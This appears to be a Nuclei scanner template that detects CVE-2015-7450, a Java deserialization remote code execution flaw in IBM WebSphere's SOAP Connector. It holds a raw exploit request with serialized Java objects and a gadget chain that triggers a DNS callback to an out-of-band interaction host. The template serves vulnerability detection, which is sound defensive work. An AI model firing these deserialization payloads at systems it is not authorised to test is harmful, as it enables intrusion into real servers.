id: CVE-2015-7450 info: name: IBM WebSphere Java Object Deserialization RCE author: wdahlenb severity: critical description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) reference: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2015-7450 cwe-id: CWE-94 requests: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 SOAPAction: "urn:AdminService" rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== getUnsavedChanges {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}} rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= matchers-condition: and matchers: - type: status status: - 500 - type: word words: - 'SOAP-ENV:Server' - '' condition: and - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns"